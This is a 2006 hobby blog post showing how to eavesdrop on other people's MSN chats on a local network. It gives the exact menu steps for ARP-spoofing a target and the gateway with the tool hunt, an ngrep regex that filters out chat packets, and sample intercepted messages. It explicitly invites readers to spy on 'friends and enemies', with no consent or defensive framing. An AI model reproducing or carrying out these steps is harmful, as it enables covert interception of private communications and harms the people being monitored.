World of Vishnu

This is another post in the ‘fun with arp’ series I’ve started. I will show you how you can eavesdrop on the MSN Conversations of your friends and enemies. This is an ARP hack, so it only works on a LAN. I described in the “Howto hack the computers in your LAN” post how you can use arp packages poisoning/spoofing to route all traffic on a switched network through you computer. We are going to use the same technique here, with some adjustments.

This is what we want to do:

• Eavesdrop on a users Msn Conversations

This is how we’re going to do it:

1. Poison the arptables of the target and the standard gateway to make all traffic go through us
2. Filter out the packages that contain the MSN messages

1. Poison the arptables of the target and the standard gateway

There are tons of tools you can use to poison arp tables, but I’m going to use a script called hunt, which is really simple and powerful. Read my “Howto hack the computers in your LAN” for instructions on how to get it.

Fire up hunt:

sudo ./hunt

In the menu system, go to:

d) daemons rst/arp/sniff/mac
a) arp spoof + arp relayer daemon
a) insert single/range arp spoof
s/k) start/stop relayer daemon (press s)

You will be asked for host1 ip and host2 ip and their mac addresses, use these values:

host1: ip address of the target
mac: YOUR mac address
host2: ip adrdress of the gateway
mac: YOUR mac address

You can find your mac address by running ifconfig.

Congratulations, now all traffic to and from the target goes through you.

2. Filter out the packages that contain the MSN messages

If you try to look at everything an active desktop pc is sending and receiving, you would go crazy within a few minutes. That’s why we need a packet filter. I based my filter on the program ngrep, which is a simple yet powerful network layer (IP) monitor/filter. It uses regex to match useful packets. The filter I designed is very simple, and i bet most of you could throw something much more effective together in a few minutes. (If you do, why not post it in comments?). If you don’t have ngrep installed, do a

sudo apt-get install ngrep

(debin/ubuntu)

The filer i used:

sudo ngrep ‘^MSG.{0,}Content-Type: text/plain.{0,}$’

This matches all packets starting with ‘MSG’, and containing ‘Content-Type: text/plain’ somewhere in the payload. If you get matches on other types of traffic, try to modify my filter. Check out the ngrep man pages and http://www.regular-expressions.info/ for more info.

The output should look something like this:

Outgoing message:

T 10.0.0.88:1148 -> 207.46.26.169:1863 [AP]
MSG 38 N 141..MIME-Version: 1.0..Content-Type: text/plain; charset=UTF-8..X-MMS-IM-Format: FN=Microsoft%20Sans%20Serif; EF=; CO=0; CS=0; PF=22….Hello my friend! How do you do?

Incoming message:

T 207.46.26.169:1863 -> 10.0.0.88:1148 [AP]
MSG targets.email-address@mail.com Target-nickname 135..MIME-Version: 1.0..Con
tent-Type: text/plain; charset=UTF-8..X-MMS-IM-Format: FN=MS%20Shell%20Dlg; EF=; CO=0; CS=0; PF=0….Not so good, my girlfriend kicked me in the nuts

If you want, you can pipe the output to a perl/php/bash script and remove everything but the nick and message, but that’s slave labour I’ll let you do yourself!

It is actually that simple!

More information on ARP spoofing can be found at
http://www.watchguard.com/infocenter/editorial/135324.asp

Happy hacking!

This entry was posted on Saturday, August 12th, 2006 at 6:39 pm and is filed under Tech, Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.